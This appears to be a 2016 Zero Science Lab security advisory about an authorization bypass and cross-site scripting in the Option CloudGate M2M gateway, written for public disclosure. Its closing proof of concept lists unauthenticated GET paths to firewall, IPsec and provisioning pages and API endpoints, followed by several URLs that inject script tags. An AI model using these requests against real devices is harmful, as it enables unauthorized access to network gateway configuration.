Option CloudGate Insecure Direct Object References Authorization Bypass

2016-06-25T00:00:00
ID ZSL-2016-5333
Type zeroscience
Reporter Gjoko Krstic
Modified 2016-06-25T00:00:00

Description

Title: Option CloudGate Insecure Direct Object References Authorization Bypass
Advisory ID: ZSL-2016-5333
Type: Local/Remote
Impact: Security Bypass, Cross-Site Scripting
Risk: (3/5)
Release Date: 25.06.2016

Summary

The CloudGate M2M gateway from Option provides competitively priced LAN to WWAN routing and GPS functionality in a single basic unit certified on all major us cellular operators (CDMA/EV-DO and WCDMA/HSPA+). The CloudGate is simple to configure locally or remotely from your PC, tablet or Smartphone.

Description

Insecure Direct Object References occur when an application provides direct access to objects based on user-supplied input. As a result of this vulnerability attackers can bypass authorization and access resources and functionalities in the system directly, for example APIs, files, upload utilities, device settings, etc.

Vendor

Option NV - <http://www.option.com>

Affected Version

CG0192-11897

Tested On

lighttpd 1.4.39
firmware 2.62.4

Vendor Status

[11.06.2016] Vulnerability discovered.
[12.06.2016] Contact with the vendor.
[24.06.2016] No response from the vendor.
[25.06.2016] Public security advisory released.

PoC

cloudgate_mv.txt

Credits

Vulnerability discovered by Gjoko Krstic - <gjoko@zeroscience.mk>

References

[1] <https://www.exploit-db.com/exploits/40016/>
[2] <https://cxsecurity.com/issue/WLB-2016060197>
[3] <https://packetstormsecurity.com/files/137654>
[4] <https://exchange.xforce.ibmcloud.com/vulnerabilities/114490>
[5] <https://exchange.xforce.ibmcloud.com/vulnerabilities/114491>

Changelog

[25.06.2016] - Initial release
[28.06.2016] - Added reference [1], [2], [3], [4] and [5]

Contact

Zero Science Lab

Web: <http://www.zeroscience.mk>
e-mail: lab@zeroscience.mk

                                        
                                            
Option CloudGate Insecure Direct Object References Authorization Bypass


Vendor: Option NV
Product web page: http://www.option.com
Affected version: CG0192-11897

Summary: The CloudGate M2M gateway from Option provides competitively
priced LAN to WWAN routing and GPS functionality in a single basic unit
certified on all major us cellular operators (CDMA/EV-DO and WCDMA/HSPA+).
The CloudGate is simple to configure locally or remotely from your PC,
tablet or Smartphone.

Desc: Insecure Direct Object References occur when an application provides
direct access to objects based on user-supplied input. As a result of this
vulnerability attackers can bypass authorization and access resources and
functionalities in the system directly, for example APIs, files, upload
utilities, device settings, etc.

Tested on: lighttpd 1.4.39
           firmware 2.62.4


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2016-5333
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5333.php


11.06.2016

--


GET /partials/firewall.html
GET /partials/system.html
GET /partials/ipsec.html
GET /partials/provisioning.html
GET /api/login
GET /api/replacementui
GET /api/goatgates

OR

/#/firewall
/#/system
/#/ipsec
/#/provisioning


XSS:

http://127.0.0.2/api/replacementui&lt;script&gt;alert(1)&lt;/script&gt;
http://127.0.0.2/api/goatgates&lt;script&gt;alert(2)&lt;/script&gt;
http://127.0.0.2/api/Blah-Blah&lt;script&gt;alert(3)&lt;/script&gt;
http://127.0.0.2/api/&lt;script&gt;alert(4)&lt;/script&gt;